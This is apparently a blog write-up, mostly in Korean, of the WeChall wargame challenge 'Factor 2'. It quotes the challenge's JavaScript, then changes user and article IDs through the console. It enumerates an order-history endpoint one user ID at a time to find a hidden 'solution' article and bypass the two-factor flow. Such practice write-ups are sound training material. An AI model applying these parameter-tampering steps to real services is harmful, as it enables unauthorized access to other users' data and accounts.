Post

Wechall - Factor 2

Wargame, Wechall
Posted

Factor 2


1
2
3
4
5
6

We have outsourced an application to an indian programmer and got disappointed.
The application is not multi language capable as agreed, but the worst is...
One of our coworkers could completely circumvent the two-factor authentication within minutes.
Can you do this as well?

To prove your success you have to order a special article.





Solution


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

window.gurroga.changeTo_historie = function() {
	console.log('changeTo_historie()');
	$('#historygrid').jsGrid({
		width: '100%',
		sorting: true,
		paging: false,
		autoload: true,
		controller: {
			loadData: function() {
				var d = $.Deferred();
				$.ajax({
					url: "../backend/api/bestellhistorie.php?user="+window.gurroga.USER.id,
					dataType: "json"
				}).done(function(response) {
					d.resolve(response.result);
				});
				return d.promise();
			}
		},
		fields: [
			{name: "article.title", type: "text", title: "Artikel"},
			{name: "article.amt", type: "text", title: "Stückzahl"},
			{name: "amt", type: "text", title: "Bestellmenge"},
			{name: "ordered_at", type: "text", title: "Bestelldatum"},
			{name: "delivered_at", type: "text", title: "Lieferdatum"},
		]
  	});
}

window.gurroga.order = function() {
	console.log('order()');
	var article = $('#bestellartikel').val();
	var amount = $('#bestellmenge').val();
	var postData = {user: window.gurroga.USER.id, id: article, amt: amount};
	$.post('../backend/api/bestellen.php', postData)
	.done(function(result){
		console.log(result);
		window.gurroga.showMessage(result);
	})
	.fail(function(result){
		console.error(result);
		window.gurroga.showError(result.responseText);
	});
};


처음엔 주문을 하라길래 gurroga.order()를 하였음. 그런데 다음과 같은 에러가 발생함.


1
2
3

Uncaught TypeError: Cannot read properties of null (reading 'id')
at Object.window.gurroga.order (factor2.js:158)
at <anonymous>:1:9


그래서 factor2.js:158로 가보니 아래에 있는 코드가 나왔음.
var postData = {user: window.gurroga.USER.id, id: article, amt: amount};


그래서 변수 값을 조정함. -> {user: 1, id: 1, amt: 1}


1
2
3
4

gurroga.order() 
-> 
<div>Vielen Dank für Ihre Bestellung!</div>
factor2.js:21 showMessage() <div>Vielen Dank für Ihre Bestellung!</div>


주문은 됬는데 문제에서 특별한 article를 주문하라 했음. 근데 코드를 보니 아래와 같은 코드가 있음.
url: "../backend/api/bestellhistorie.php?user="+window.gurroga.USER.id
그래서 ?user=1로 이동하였음.
{"status":"success","result":[{"article":{"id":1,"name":"bueroklammern","amt":100,"title":"B\u00fcroklammern"},"amt":1,"ordered_at":"2018-10-29","delivered_at":"2018-10-30"}]}


?user=2 ~ ?user=6까지 이동해보았더니 ?user=6에서 아래와 같은 코드가 나옴.
{"article":{"id":5678363,"name":"solution","amt":1,"title":"Challenge solution for Factor 2"}
따라서 id 값을 5678363으로 수정하고 user를 6으로 수정한 후 order를 해보니 성공.
{user: 6, id: 5678363, amt: 1}





Wargame, Wechall
This post is licensed under CC BY 4.0 by the author.